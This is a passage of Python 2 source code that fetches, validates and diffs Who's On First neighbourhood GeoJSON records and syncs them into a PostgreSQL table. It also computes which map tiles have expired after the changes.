# to catch this scenario.
self.wof_id = wof_id
self.reason = reason
self.message = message
self.halt = halt
self.skipped = skipped
self.funky = funky
self.superseded = superseded
# keep this as a constant - it actually takes a significant amount of time to
# re-parse this every time, when we know it's a constant.
MOST_UNKNOWN_EDTF = parse_edtf('uuuu')
# given a string, parse it as EDTF while allowing a single 'u', four u's
# 'uuuu', or None to mean completely unknown, and return the EDTF object.
def _normalize_edtf(s):
if s and s != 'u' and s != 'uuuu':
try:
return parse_edtf(s)
except Exception:
pass
# when all else fails, return the "most unknown" EDTF.
return MOST_UNKNOWN_EDTF
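# A minimal sketch of the fallback behaviour (illustrative inputs):
#   _normalize_edtf('2015')        # parsed as a normal EDTF date
#   _normalize_edtf('u')           # treated as completely unknown
#   _normalize_edtf(None)          # also returns MOST_UNKNOWN_EDTF
#   _normalize_edtf('not-a-date')  # unparseable input falls back to MOST_UNKNOWN_EDTF too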
def create_neighbourhood_from_json(json_data, neighbourhood_meta):
def failure(reason):
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, reason, json.dumps(json_data))
if not isinstance(json_data, dict):
return failure('Unexpected json')
props = json_data.get('properties')
if props is None or not isinstance(props, dict):
return failure('Missing properties')
superseded_by = props.get('wof:superseded_by')
# these often show up as empty lists, so we do a truthy test
# instead of explicitly checking for None
if superseded_by:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'superseded_by: %s' % superseded_by,
json.dumps(json_data), superseded=True)
geometry = json_data.get('geometry')
if geometry is None:
return failure('Missing geometry')
try:
shape_lnglat = shapely.geometry.shape(geometry)
except Exception:
return failure('Unexpected geometry')
shape_mercator = shapely.ops.transform(
reproject_lnglat_to_mercator, shape_lnglat)
# ignore any features that are marked as funky
is_funky = props.get('mz:is_funky')
if is_funky is not None:
try:
is_funky = int(is_funky)
except ValueError:
return failure('Unexpected mz:is_funky value %s' % is_funky)
if is_funky != 0:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'mz:is_funky value is not 0: %s' % is_funky,
json.dumps(json_data), funky=True)
wof_id = props.get('wof:id')
if wof_id is None:
return failure('Missing wof:id')
try:
wof_id = int(wof_id)
except ValueError:
return failure('wof_id is not an int: %s' % wof_id)
name = props.get('wof:name')
if name is None:
return failure('Missing name')
n_photos = props.get('misc:photo_sum')
if n_photos is not None:
try:
n_photos = int(n_photos)
except ValueError:
return failure('misc:photo_sum is not an int: %s' % n_photos)
label_lat = props.get('lbl:latitude')
label_lng = props.get('lbl:longitude')
if label_lat is None or label_lng is None:
# first, try to fall back to geom:* when lbl:* is missing. we'd prefer
# to have lbl:*, but it's better to have _something_ than nothing.
label_lat = props.get('geom:latitude')
label_lng = props.get('geom:longitude')
if label_lat is None or label_lng is None:
return failure('Missing lbl:latitude or lbl:longitude and ' +
'geom:latitude or geom:longitude')
try:
label_lat = float(label_lat)
label_lng = float(label_lng)
except ValueError:
return failure('lbl:latitude or lbl:longitude not float')
label_merc_x, label_merc_y = reproject_lnglat_to_mercator(
label_lng, label_lat)
label_position = shapely.geometry.Point(label_merc_x, label_merc_y)
placetype = props.get('wof:placetype')
if placetype is None:
return failure('Missing wof:placetype')
default_min_zoom = 15
default_max_zoom = 16
min_zoom = props.get('mz:min_zoom')
if min_zoom is None:
min_zoom = default_min_zoom
else:
try:
min_zoom = float(min_zoom)
except ValueError:
return failure('mz:min_zoom not float: %s' % min_zoom)
max_zoom = props.get('mz:max_zoom')
if max_zoom is None:
max_zoom = default_max_zoom
else:
try:
max_zoom = float(max_zoom)
except ValueError:
return failure('mz:max_zoom not float: %s' % max_zoom)
is_landuse_aoi = props.get('mz:is_landuse_aoi')
if is_landuse_aoi is not None:
try:
is_landuse_aoi = int(is_landuse_aoi)
except ValueError:
return failure('is_landuse_aoi not int: %s' % is_landuse_aoi)
is_landuse_aoi = is_landuse_aoi != 0
if shape_mercator.type in ('Polygon', 'MultiPolygon'):
area = int(shape_mercator.area)
else:
area = None
# for the purposes of display, we only care about the times when something
# should first start to be shown, and the time when it should stop
# showing.
edtf_inception = _normalize_edtf(props.get('edtf:inception'))
edtf_cessation = _normalize_edtf(props.get('edtf:cessation'))
edtf_deprecated = _normalize_edtf(props.get('edtf:deprecated'))
# check that the dates are valid first, so we can return a better error
inception_earliest = edtf_inception.lower_fuzzy()
cessation_latest = edtf_cessation.upper_fuzzy()
deprecated_latest = edtf_deprecated.upper_fuzzy()
if inception_earliest is None:
return failure('invalid edtf:inception: %s' %
props.get('edtf:inception'))
if cessation_latest is None:
return failure('invalid edtf:cessation: %s' %
props.get('edtf:cessation'))
if deprecated_latest is None:
return failure('invalid edtf:deprecated: %s' %
props.get('edtf:deprecated'))
# the 'edtf:inception' property approximates when the item should start
# being shown, so we take the earliest date it could mean. the
# 'edtf:cessation' and 'edtf:deprecated' properties would both stop the
# item showing, so we take the earlier of their latest possible dates.
inception = inception_earliest
cessation = min(cessation_latest, deprecated_latest)
# grab any names in other languages
lang_suffix_size = len('_preferred')
l10n_names = {}
for k, v in props.iteritems():
if not v:
continue
if not k.startswith('name:') or not k.endswith('_preferred'):
continue
if isinstance(v, list):
v = v[0]
lang = k[:-lang_suffix_size]
l10n_names[lang] = v
if not l10n_names:
l10n_names = None
wikidata = None
# get wikidata ID concordance, if there is one
concordances = props.get('wof:concordances')
if concordances:
wikidata = concordances.get('wd:id')
neighbourhood = Neighbourhood(
wof_id, placetype, name, neighbourhood_meta.hash, label_position,
shape_mercator, n_photos, area, min_zoom, max_zoom, is_landuse_aoi,
inception, cessation, l10n_names, wikidata)
return neighbourhood
def fetch_url_raw_neighbourhood(url, neighbourhood_meta, max_retries):
try:
s = _make_requests_session_with_retries(max_retries)
r = s.get(url)
except Exception as e:
# if there is an IO error when fetching the url itself, we'll
# want to halt too
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, 'IO Error fetching %s' % url, str(e),
halt=True)
if r.status_code != 200:
# once we don't get a 200, signal that we should stop all
# remaining processing
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Invalid response %d for %s' % (r.status_code, url), r.text,
halt=True)
try:
doc = r.json()
except Exception as e:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, 'Response is not json for %s' % url,
r.text)
try:
neighbourhood = create_neighbourhood_from_json(doc, neighbourhood_meta)
except Exception as e:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Unexpected exception parsing json',
json.dumps(doc))
return neighbourhood
def fetch_fs_raw_neighbourhood(path, neighbourhood_meta):
with open(path) as fp:
json_data = json.load(fp)
neighbourhood = create_neighbourhood_from_json(json_data,
neighbourhood_meta)
return neighbourhood
def generate_wof_url(url_prefix, wof_id):
wof_id_str = str(wof_id)
grouped = []
grouping = []
for c in wof_id_str:
grouping.append(c)
if len(grouping) == 3:
grouped.append(grouping)
grouping = []
if grouping:
grouped.append(grouping)
grouped_part = '/'.join([''.join(part) for part in grouped])
wof_url = '%s/%s/%s.geojson' % (url_prefix, grouped_part, wof_id_str)
return wof_url
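# Worked example (id chosen purely for illustration): the WOF id is split into
# groups of three digits to build the data path, so
#   generate_wof_url('https://example.com/data', 85887469)
# returns 'https://example.com/data/858/874/69/85887469.geojson'.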
def make_fetch_raw_url_fn(data_url_prefix, max_retries):
def fn(neighbourhood_meta):
wof_url = generate_wof_url(
data_url_prefix, neighbourhood_meta.wof_id)
neighbourhood = fetch_url_raw_neighbourhood(wof_url,
neighbourhood_meta,
max_retries)
return neighbourhood
return fn
def make_fetch_raw_filesystem_fn(data_path):
def fn(neighbourhood_meta):
# this will work for OSes with '/' path separators
wof_path = generate_wof_url(
data_path, neighbourhood_meta.wof_id)
neighbourhood = fetch_fs_raw_neighbourhood(wof_path,
neighbourhood_meta)
return neighbourhood
return fn
def threaded_fetch(neighbourhood_metas, n_threads, fetch_raw_fn):
queue_size = n_threads * 10
neighbourhood_input_queue = Queue.Queue(queue_size)
neighbourhood_output_queue = Queue.Queue(len(neighbourhood_metas))
stop = threading.Event()
def _fetch_raw_neighbourhood():
while True:
neighbourhood_meta = neighbourhood_input_queue.get()
if neighbourhood_meta is None:
break
if stop.is_set():
# assume all remaining neighbourhoods are failures
# these will get skipped
neighbourhood_output_queue.put(NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Skipping remaining neighbourhoods',
'Skipping remaining neighbourhoods',
skipped=True))
continue
neighbourhood = fetch_raw_fn(neighbourhood_meta)
if isinstance(neighbourhood, NeighbourhoodFailure):
failure = neighbourhood
# if this is the type of error that should stop all
# processing, notify all other threads
if failure.halt:
stop.set()
neighbourhood_output_queue.put(neighbourhood)
fetch_threads = []
for i in xrange(n_threads):
fetch_thread = threading.Thread(target=_fetch_raw_neighbourhood)
fetch_thread.start()
fetch_threads.append(fetch_thread)
for neighbourhood_meta in neighbourhood_metas:
neighbourhood_input_queue.put(neighbourhood_meta)
for fetch_thread in fetch_threads:
neighbourhood_input_queue.put(None)
neighbourhoods = []
failures = []
for i in xrange(len(neighbourhood_metas)):
neighbourhood = neighbourhood_output_queue.get()
if isinstance(neighbourhood, NeighbourhoodFailure):
failures.append(neighbourhood)
else:
neighbourhoods.append(neighbourhood)
for fetch_thread in fetch_threads:
fetch_thread.join()
return neighbourhoods, failures
class WofUrlNeighbourhoodFetcher(object):
def __init__(self, neighbourhood_url, microhood_url, macrohood_url,
borough_url, data_url_prefix, n_threads, max_retries):
self.neighbourhood_url = neighbourhood_url
self.microhood_url = microhood_url
self.macrohood_url = macrohood_url
self.borough_url = borough_url
self.data_url_prefix = data_url_prefix
self.n_threads = n_threads
self.max_retries = max_retries
def fetch_meta_neighbourhoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.neighbourhood_url, 'neighbourhood', self.max_retries)
def fetch_meta_microhoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.microhood_url, 'microhood', self.max_retries)
def fetch_meta_macrohoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.macrohood_url, 'macrohood', self.max_retries)
def fetch_meta_boroughs(self):
return fetch_wof_url_meta_neighbourhoods(
self.borough_url, 'borough', self.max_retries)
def fetch_raw_neighbourhoods(self, neighbourhood_metas):
url_fetch_fn = make_fetch_raw_url_fn(self.data_url_prefix,
self.max_retries)
neighbourhoods, failures = threaded_fetch(
neighbourhood_metas, self.n_threads, url_fetch_fn)
return neighbourhoods, failures
class WofFilesystemNeighbourhoodFetcher(object):
def __init__(self, wof_data_path, n_threads):
self.wof_data_path = wof_data_path
self.n_threads = n_threads
def _fetch_meta_neighbourhoods(self, placetype):
meta_fs_path = os.path.join(
self.wof_data_path, 'meta', 'wof-%s-latest.csv' % placetype)
with open(meta_fs_path) as fp:
meta_neighbourhoods = list(
parse_neighbourhood_meta_csv(fp, placetype))
return meta_neighbourhoods
def fetch_meta_neighbourhoods(self):
return self._fetch_meta_neighbourhoods('neighbourhood')
def fetch_meta_microhoods(self):
return self._fetch_meta_neighbourhoods('microhood')
def fetch_meta_macrohoods(self):
return self._fetch_meta_neighbourhoods('macrohood')
def fetch_meta_boroughs(self):
return self._fetch_meta_neighbourhoods('borough')
def fetch_raw_neighbourhoods(self, neighbourhood_metas):
data_prefix = os.path.join(
self.wof_data_path, 'data')
fs_fetch_fn = make_fetch_raw_filesystem_fn(data_prefix)
neighbourhoods, failures = threaded_fetch(
neighbourhood_metas, self.n_threads, fs_fetch_fn)
return neighbourhoods, failures
def create_neighbourhood_file_object(neighbourhoods, curdate=None):
buf = StringIO()
write_neighbourhood_data_to_file(buf, neighbourhoods, curdate)
buf.seek(0)
return buf
def escape_string(s):
return s.encode('utf-8').replace('\t', ' ').replace('\n', ' ')
def escape_hstore_string(s):
s = escape_string(s)
if ' ' in s or ',' in s:
s = s.replace('"', '\\\\"')
s = '"%s"' % s
return s
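# Quick illustration of the escaping rules (example values only): plain tokens
# pass through unchanged, while values containing spaces or commas get quoted
# so they survive inside an hstore literal, e.g.
#   escape_hstore_string('Paris')    ->  'Paris'
#   escape_hstore_string('New York') ->  '"New York"'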
def write_neighbourhood_data_to_file(buf, neighbourhoods, curdate=None):
if curdate is None:
curdate = datetime.now().date()
# tell shapely to include the srid when generating WKBs
geos.WKBWriter.defaults['include_srid'] = True
def write_nullable_int(buf, x):
if x is None:
buf.write('\\N\t')
else:
buf.write('%d\t' % x)
for n in neighbourhoods:
buf.write('%d\t' % n.wof_id)
buf.write('%d\t' % neighbourhood_placetypes_to_int[n.placetype])
buf.write('%s\t' % escape_string(n.name))
buf.write('%s\t' % escape_string(n.hash))
write_nullable_int(buf, n.n_photos)
write_nullable_int(buf, n.area)
buf.write('%d\t' % n.min_zoom)
buf.write('%d\t' % n.max_zoom)
if n.is_landuse_aoi is None:
buf.write('\\N\t')
else:
buf.write('%s\t' % ('true' if n.is_landuse_aoi else 'false'))
geos.lgeos.GEOSSetSRID(n.label_position._geom, DATABASE_SRID)
buf.write(n.label_position.wkb_hex)
buf.write('\t')
geos.lgeos.GEOSSetSRID(n.geometry._geom, DATABASE_SRID)
buf.write(n.geometry.wkb_hex)
buf.write('\t')
buf.write('%s\t' % n.inception.isoformat())
buf.write('%s\t' % n.cessation.isoformat())
is_visible = n.inception < curdate and n.cessation >= curdate
is_visible_str = 't' if is_visible else 'f'
buf.write('%s\t' % is_visible_str)
if n.l10n_names:
hstore_items = []
for k, v in n.l10n_names.items():
k = escape_hstore_string(k)
v = escape_hstore_string(v)
hstore_items.append("%s=>%s" % (k, v))
hstore_items_str = ','.join(hstore_items)
buf.write('%s' % hstore_items_str)
else:
buf.write('\\N')
buf.write('\t')
if n.wikidata:
buf.write(escape_string(n.wikidata))
else:
buf.write('\\N')
buf.write('\n')
class WofModel(object):
def __init__(self, postgresql_conn_info):
self.postgresql_conn_info = postgresql_conn_info
self.table = 'wof_neighbourhood'
def _create_conn(self):
conn = psycopg2.connect(**self.postgresql_conn_info)
register_hstore(conn)
conn.set_session(autocommit=False)
return conn
def find_previous_neighbourhood_meta(self):
with closing(self._create_conn()) as conn:
with conn.cursor() as cursor:
cursor.execute(
'SELECT wof_id, placetype, name, hash, '
'ST_AsBinary(label_position) '
'FROM %s ORDER BY wof_id ASC' % self.table)
ns = []
for row in cursor:
wof_id, placetype_int, name, hash, label_bytes = row
wof_id = int(wof_id)
label_bytes = bytes(label_bytes)
label_position = shapely.wkb.loads(label_bytes)
placetype = neighbourhood_int_to_placetypes[placetype_int]
n = NeighbourhoodMeta(
wof_id, placetype, name, hash, label_position)
ns.append(n)
return ns
def sync_neighbourhoods(
self, neighbourhoods_to_add, neighbourhoods_to_update,
ids_to_remove):
geos.WKBWriter.defaults['include_srid'] = True
def gen_data(n):
geos.lgeos.GEOSSetSRID(n.label_position._geom, DATABASE_SRID)
geos.lgeos.GEOSSetSRID(n.geometry._geom, DATABASE_SRID)
return dict(
table=self.table,
placetype=neighbourhood_placetypes_to_int[n.placetype],
name=n.name,
hash=n.hash,
n_photos=n.n_photos,
area=n.area,
min_zoom=n.min_zoom,
max_zoom=n.max_zoom,
is_landuse_aoi=n.is_landuse_aoi,
inception=n.inception,
cessation=n.cessation,
label_position=n.label_position.wkb_hex,
geometry=n.geometry.wkb_hex,
wof_id=n.wof_id,
l10n_name=n.l10n_names,
wikidata=n.wikidata,
)
if ids_to_remove:
ids_to_remove_str = ', '.join(map(str, ids_to_remove))
if neighbourhoods_to_update:
update_data = map(gen_data, neighbourhoods_to_update)
if neighbourhoods_to_add:
insert_data = map(gen_data, neighbourhoods_to_add)
# this closes the connection
with closing(self._create_conn()) as conn:
# this commits the transaction
with conn as conn:
# this frees any resources associated with the cursor
with conn.cursor() as cursor:
if ids_to_remove:
cursor.execute(
'DELETE FROM %s WHERE wof_id IN (%s)' %
(self.table, ids_to_remove_str))
if neighbourhoods_to_update:
cursor.executemany(
'UPDATE ' + self.table + ' SET '
'placetype=%(placetype)s, '
'name=%(name)s, '
'hash=%(hash)s, '
'n_photos=%(n_photos)s, '
'area=%(area)s, '
'min_zoom=%(min_zoom)s, '
'max_zoom=%(max_zoom)s, '
'is_landuse_aoi=%(is_landuse_aoi)s, '
'inception=%(inception)s, '
'cessation=%(cessation)s, '
'label_position=%(label_position)s, '
'l10n_name=%(l10n_name)s, '
'wikidata=%(wikidata)s, '
'geometry=%(geometry)s '
'WHERE wof_id=%(wof_id)s',
update_data)
if neighbourhoods_to_add:
cursor.executemany(
'INSERT INTO ' + self.table + ' '
'(wof_id, placetype, name, hash, n_photos, area, '
'min_zoom, max_zoom, is_landuse_aoi, '
'inception, cessation, '
'label_position, geometry, l10n_name, wikidata) '
'VALUES (%(wof_id)s, %(placetype)s, %(name)s, '
'%(hash)s, %(n_photos)s, %(area)s, %(min_zoom)s, '
'%(max_zoom)s, %(is_landuse_aoi)s, '
'%(inception)s, %(cessation)s, '
'%(label_position)s, %(geometry)s, %(l10n_name)s, '
'%(wikidata)s)',
insert_data)
def insert_neighbourhoods(self, neighbourhoods):
# create this whole input file-like object outside of the transaction
nf = create_neighbourhood_file_object(neighbourhoods)
# close the connection
with closing(self._create_conn()) as conn:
# commit the transaction
with conn as conn:
with conn.cursor() as cursor:
cursor.copy_from(nf, self.table)
# update the whole table so that the `is_visible` flag is accurate for the
# `current_date`. this returns a set of coord ints at `zoom` which have
# changed visibility from true to false or vice-versa.
def update_visible_timestamp(self, zoom, current_date):
coords = set()
def coord_int(row):
x, y = row
return coord_int_at_mercator_point(zoom, x, y)
# close the connection
with closing(self._create_conn()) as conn:
# commit the transaction
with conn as conn:
with conn.cursor() as cursor:
# select the x, y position of the label for each WOF
# neighbourhood that changed visibility when the date
# was updated to `current_date`.
cursor.execute(
'SELECT st_x(n.label_position) as x, '
' st_y(n.label_position) as y '
'FROM ('
' SELECT wof_update_visible_ids(%s::date) AS id '
') u '
'JOIN wof_neighbourhood n '
'ON n.wof_id = u.id',
(current_date.isoformat(),))
for result in cursor:
coords.add(coord_int(result))
return coords
def diff_neighbourhoods(xs, ys):
# NOTE this requires that both xs and ys be sequences of
# neighbourhoods, sorted by wof_id in ascending order
# returns a sequence of tuples:
# (None, x) -> neighbourhoods that have been added
# (x, None) -> neighbourhoods that have been removed
# (x, y) -> neighbourhoods that have been updated
diffs = []
n_xs = len(xs)
n_ys = len(ys)
idx_xs = 0
idx_ys = 0
# iterate through both lists while we still have values for both
while idx_xs < n_xs and idx_ys < n_ys:
x = xs[idx_xs]
y = ys[idx_ys]
if x.wof_id < y.wof_id:
diffs.append((x, None))
idx_xs += 1
continue
if y.wof_id < x.wof_id:
diffs.append((None, y))
idx_ys += 1
continue
if x.hash != y.hash:
# if there are any differences the hash will be different
diffs.append((x, y))
idx_xs += 1
idx_ys += 1
# any records remaining in only one of the lists are removals (from xs)
# or additions (from ys)
while idx_xs < n_xs:
x = xs[idx_xs]
diffs.append((x, None))
idx_xs += 1
while idx_ys < n_ys:
y = ys[idx_ys]
diffs.append((None, y))
idx_ys += 1
return diffs
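# Worked example with made-up records, both lists sorted by wof_id: if xs
# (previous) holds ids [1, 2, 4] and ys (new) holds ids [2, 3, 4], where id 2
# has an unchanged hash and id 4 a changed one, the result is
#   [(x1, None), (None, y3), (x4, y4)]
# i.e. id 1 was removed, id 3 was added and id 4 was updated.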
def coord_int_at_mercator_point(z, x, y):
coord = mercator_point_to_coord(z, x, y)
coord_int = coord_marshall_int(coord)
return coord_int
def generate_tile_expiry_list(zoom, diffs):
coord_ints = set()
def add_neighbourhood_diff(n):
if n is not None:
x = n.label_position.x
y = n.label_position.y
coord_int = coord_int_at_mercator_point(zoom, x, y)
coord_ints.add(coord_int)
for n1, n2 in diffs:
# for our purposes, we will expire any kind of modification,
# whether the neighbourhoods were added, removed, or updated
add_neighbourhood_diff(n1)
add_neighbourhood_diff(n2)
return coord_ints
def log_failure(logger, failure):
if not (failure.skipped or failure.funky or failure.superseded):
failure_message_one_line = failure.message.replace('\n', ' | ')
logger.error('Neighbourhood failure for %d: %r - %r' % (
failure.wof_id, failure.reason, failure_message_one_line))
class WofProcessor(object):
def __init__(self, fetcher, model, redis_cache_index, intersector,
rawr_enqueuer, logger, current_date):
self.fetcher = fetcher
self.model = model
self.redis_cache_index = redis_cache_index
self.intersector = intersector
self.rawr_enqueuer = rawr_enqueuer
self.logger = logger
self.zoom_expiry = 16
self.zoom_until = 11
self.current_date = current_date
def __call__(self):
# perform IO to get old/new neighbourhoods and tiles of
# interest in parallel
# queues to pass the results through the threads
prev_neighbourhoods_queue = Queue.Queue(1)
meta_neighbourhoods_queue = Queue.Queue(1)
meta_microhoods_queue = Queue.Queue(1)
meta_macrohoods_queue = Queue.Queue(1)
meta_boroughs_queue = Queue.Queue(1)
toi_queue = Queue.Queue(1)
# functions for the threads
def find_prev_neighbourhoods():
prev_neighbourhoods = (
self.model.find_previous_neighbourhood_meta())
prev_neighbourhoods_queue.put(prev_neighbourhoods)
def make_fetch_meta_csv_fn(fn, queue):
    # return a callable so the fetch actually runs inside the worker thread,
    # rather than eagerly at Thread construction time
    def _fetch_meta_csv():
        neighbourhood_metas = list(fn())
        queue.put(neighbourhood_metas)
    return _fetch_meta_csv
def fetch_toi():
toi = self.redis_cache_index.fetch_tiles_of_interest()
toi_queue.put(toi)
self.logger.info('Fetching tiles of interest in background ...')
self.logger.info('Fetching old and new neighbourhoods ...')
# start the threads in parallel
prev_neighbourhoods_thread = threading.Thread(
target=find_prev_neighbourhoods)
prev_neighbourhoods_thread.start()
meta_neighbourhoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_neighbourhoods,
meta_neighbourhoods_queue))
meta_neighbourhoods_thread.start()
meta_microhoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_microhoods,
meta_microhoods_queue))
meta_microhoods_thread.start()
meta_macrohoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_macrohoods,
meta_macrohoods_queue))
meta_macrohoods_thread.start()
meta_boroughs_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_boroughs,
meta_boroughs_queue))
meta_boroughs_thread.start()
toi_thread = threading.Thread(target=fetch_toi)
toi_thread.start()
# ensure we're done finding the previous and new
# neighbourhoods by this point
prev_neighbourhoods_thread.join()
meta_neighbourhoods_thread.join()
meta_microhoods_thread.join()
meta_macrohoods_thread.join()
meta_boroughs_thread.join()
self.logger.info('Fetching old and new neighbourhoods ... done')
prev_neighbourhoods = prev_neighbourhoods_queue.get()
meta_neighbourhoods = meta_neighbourhoods_queue.get()
meta_microhoods = meta_microhoods_queue.get()
meta_macrohoods = meta_macrohoods_queue.get()
meta_boroughs = meta_boroughs_queue.get()
# each of these has the appropriate placetype set now
meta_neighbourhoods = (
meta_neighbourhoods + meta_microhoods + meta_macrohoods +
meta_boroughs)
self.logger.info('Diffing neighbourhoods ...')
by_neighborhood_id = attrgetter('wof_id')
# the model is expected to return records in ascending order by id
# it doesn't seem like the neighbourhoods in the wof csv
# are in ascending order, so we sort explicitly here
meta_neighbourhoods.sort(key=by_neighborhood_id)
# the diff algorithm depends on the neighbourhood lists
# being in sorted order by id
diffs = diff_neighbourhoods(prev_neighbourhoods,
meta_neighbourhoods)
self.logger.info('Diffing neighbourhoods ... done')
# we need to fetch neighbourhoods that have either been
# updated or are new
wof_neighbourhoods_to_fetch = []
# based on the diff, we'll need to keep track of how we'll
# need to update
ids_to_add = set()
ids_to_update = set()
ids_to_remove = set()
for dx, dy in diffs:
if dy is not None:
if dx is None:
ids_to_add.add(dy.wof_id)
else:
ids_to_update.add(dy.wof_id)
wof_neighbourhoods_to_fetch.append(dy)
else:
ids_to_remove.add(dx.wof_id)
if wof_neighbourhoods_to_fetch:
self.logger.info('Fetching %d raw neighbourhoods ...' %
len(wof_neighbourhoods_to_fetch))
raw_neighbourhoods, failures = (
self.fetcher.fetch_raw_neighbourhoods(
wof_neighbourhoods_to_fetch))
self.logger.info('Fetching %d raw neighbourhoods ... done' %
len(wof_neighbourhoods_to_fetch))
else:
self.logger.info('No raw neighbourhoods found to fetch')
raw_neighbourhoods = ()
failures = []
# we should just remove any failed neighbourhoods from the add/update lists
# and also keep track of these ids so we can remove them from the diffs too
failed_wof_ids = set()
superseded_by_wof_ids = set()
funky_wof_ids = set()
for failure in failures:
failure_wof_id = failure.wof_id
log_failure(self.logger, failure)
if failure.funky:
# this scenario is triggered for new neighbourhoods,
# or if a neighbourhood became funky
# we handle both of these scenarios in tests later on,
# but for now we just track the id of the funky
# neighbourhoods
funky_wof_ids.add(failure_wof_id)
if failure.superseded:
self.logger.warn(
'superseded_by inconsistency for %s' % failure_wof_id)
# this means that we had a value for superseded_by in
# the raw json, but not in the meta file
# this should get treated as a removal
superseded_by_wof_ids.add(failure_wof_id)
failed_wof_ids.add(failure_wof_id)
ids_to_add.discard(failure_wof_id)
ids_to_update.discard(failure_wof_id)
# we'll only log the number of funky records that we found
if funky_wof_ids:
self.logger.warn('Number of funky neighbourhoods: %d' %
len(funky_wof_ids))
# now we'll want to ensure that the failed ids are not present
# in any additions or updates
new_diffs = []
for n1, n2 in diffs:
if n2 is None or n2.wof_id not in failed_wof_ids:
new_diffs.append((n1, n2))
diffs = new_diffs
# and we'll want to also treat any superseded_by
# inconsistencies as removals
# but we need the original neighbourhood meta object to
# generate the diff, for its label position to expire the
# appropriate tile
if superseded_by_wof_ids:
for n in prev_neighbourhoods:
if n.wof_id in superseded_by_wof_ids:
ids_to_remove.add(n.wof_id)
diffs.append((n, None))
# if the neighbourhood became funky and we had it in our
# existing set, we'll want to remove it
if funky_wof_ids:
for n in prev_neighbourhoods:
if n.wof_id in funky_wof_ids:
ids_to_remove.add(n.wof_id)
diffs.append((n, None))
sync_neighbourhoods_thread = None
if diffs:
self.logger.info("Sync'ing neighbourhoods ...")
# raw_neighbourhoods contains both the neighbourhoods to
# add and update
# we split it up here
neighbourhoods_to_update = []
neighbourhoods_to_add = []
for neighbourhood in raw_neighbourhoods:
if neighbourhood.wof_id in ids_to_add:
neighbourhoods_to_add.append(neighbourhood)
elif neighbourhood.wof_id in ids_to_update:
neighbourhoods_to_update.append(neighbourhood)
else:
assert 0, '%d should have been found to add or update' % (
neighbourhood.wof_id)
if neighbourhoods_to_add:
self.logger.info('Inserting neighbourhoods: %d' %
len(neighbourhoods_to_add))
if neighbourhoods_to_update:
self.logger.info('Updating neighbourhoods: %d' %
len(neighbourhoods_to_update))
if ids_to_remove:
self.logger.info('Removing neighbourhoods: %d' %
len(ids_to_remove))
def _sync_neighbourhoods():
self.model.sync_neighbourhoods(
neighbourhoods_to_add, neighbourhoods_to_update,
ids_to_remove)
sync_neighbourhoods_thread = threading.Thread(
target=_sync_neighbourhoods)
sync_neighbourhoods_thread.start()
else:
self.logger.info('No diffs found, no sync necessary')
if diffs:
self.logger.info('Generating tile expiry list ...')
expired_coord_ints = generate_tile_expiry_list(
self.zoom_expiry, diffs)
self.logger.info(
'Generating tile expiry list ... done - '
'Found %d expired tiles' % len(expired_coord_ints))
else:
self.logger.info('No diffs found, not generating expired coords')
expired_coord_ints = set()
# ensure we're done fetching the tiles of interest by this point
toi_thread.join()
toi = toi_queue.get()
self.logger.info('Have tiles of interest')
# we need to finish sync'ing neighbourhoods before we flip the
# visibility flag and enqueue coordinates
if sync_neighbourhoods_thread is not None:
sync_neighbourhoods_thread.join()
self.logger.info("Sync'ing neighbourhoods ... done")
# update the current timestamp, returning the list of coords that
# have changed visibility.
visibility_updates = \
self.model.update_visible_timestamp(
self.zoom_expiry, self.current_date)
self.logger.info('Have %d tile expiries from visibility changes.'
% len(visibility_updates))
expired_coord_ints.update(visibility_updates)
if diffs:
# intersect the tiles of interest with the expired coords from
# the neighbourhood diff
self.logger.info('Intersecting %d tiles of interest with %d '
'expired tiles' % (
len(toi), len(expired_coord_ints)))
toi_expired_coord_ints, _ = self.intersector(
expired_coord_ints, toi, self.zoom_until)
coords = map(coord_unmarshall_int, toi_expired_coord_ints)
self.logger.info('Intersection complete, will expire %d tiles' %
len(coords))
else:
self.logger.info('No diffs found, no need to intersect')
coords = ()
if coords:
self.logger.info('Asking enqueuer to enqueue %d coords ...' %
len(coords))
self.rawr_enqueuer(coords)
self.logger.info('Asking enqueuer to enqueue %d coords ... done' %
len(coords))
else:
self.logger.info('No expired tiles to enqueue')
class WofInitialLoader(object):
def __init__(self, fetcher, model, logger):
self.fetcher = fetcher
self.model = model
self.logger = logger
def __call__(self):
self.logger.info('Fetching meta neighbourhoods csv ...')
neighbourhood_metas = list(self.fetcher.fetch_meta_neighbourhoods())
self.logger.info('Fetching meta neighbourhoods csv ... done')
self.logger.info('Fetching meta microhoods csv ...')
microhood_metas = list(self.fetcher.fetch_meta_microhoods())
self.logger.info('Fetching meta microhoods csv ... done')
self.logger.info('Fetching meta macrohoods csv ...')
macrohood_metas = list(self.fetcher.fetch_meta_macrohoods())
self.logger.info('Fetching meta macrohoods csv ... done')
self.logger.info('Fetching meta boroughs csv ...')
borough_metas = list(self.fetcher.fetch_meta_boroughs())
self.logger.info('Fetching meta boroughs csv ... done')
neighbourhood_metas = (
neighbourhood_metas + microhood_metas + macrohood_metas +
borough_metas)
self.logger.info('Fetching raw neighbourhoods ...')
neighbourhoods, failures = self.fetcher.fetch_raw_neighbourhoods(
neighbourhood_metas)
for failure in failures:
log_failure(self.logger, failure)
self.logger.info('Fetching raw neighbourhoods ... done')
self.logger.info('Inserting %d neighbourhoods ...' %
len(neighbourhoods))
self.model.insert_neighbourhoods(neighbourhoods)
self.logger.info('Inserting %d neighbourhoods ... done' %
len(neighbourhoods))
def make_wof_url_neighbourhood_fetcher(
neighbourhood_url, microhood_url, macrohood_url, borough_url,
data_prefix_url, n_threads, max_retries):
fetcher = WofUrlNeighbourhoodFetcher(
neighbourhood_url, microhood_url, macrohood_url, borough_url,
